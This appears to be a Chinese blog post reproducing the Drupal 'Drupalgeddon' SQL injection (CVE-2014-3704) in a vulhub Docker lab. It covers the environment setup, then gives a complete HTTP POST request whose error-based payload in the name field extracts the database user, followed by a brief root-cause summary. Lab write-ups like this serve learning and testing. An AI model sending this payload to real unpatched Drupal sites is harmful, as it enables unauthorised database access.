vulhub

CVE-2014-3704

2019-08-05  本文已影响5人  3mi1e

Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)

1.漏洞影响版本

Drupal < 7.32

2.漏洞危害

SQL注入

3.漏洞POC
cd /root/vulhub/drupal/CVE-2014-3704                   //进入本次复现的漏洞目录
docker-compose up -d                                   //docker-compose搭建环境

环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用默认配置安装即可。
其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql:

Drupal设置

安装完成后,访问首页:

首页

发送如下数据包即可爆出user

POST /?q=node&destination=node HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
报错注入
4.复盘

漏洞出现原因
未对SQL语句进行严格过滤
总结
1.sql注入处:name[0 or updatexml(0,concat(0xa,user()),0)%23]
2.sqlmap跑不出来,看了一些文章,打算之后做一些updatexml的ctf题,自己试着写sqlmap的脚本。(自信的flag,相信这不会远,最近有些忙,但是依旧会保持更新。)

上一篇下一篇

猜你喜欢

热点阅读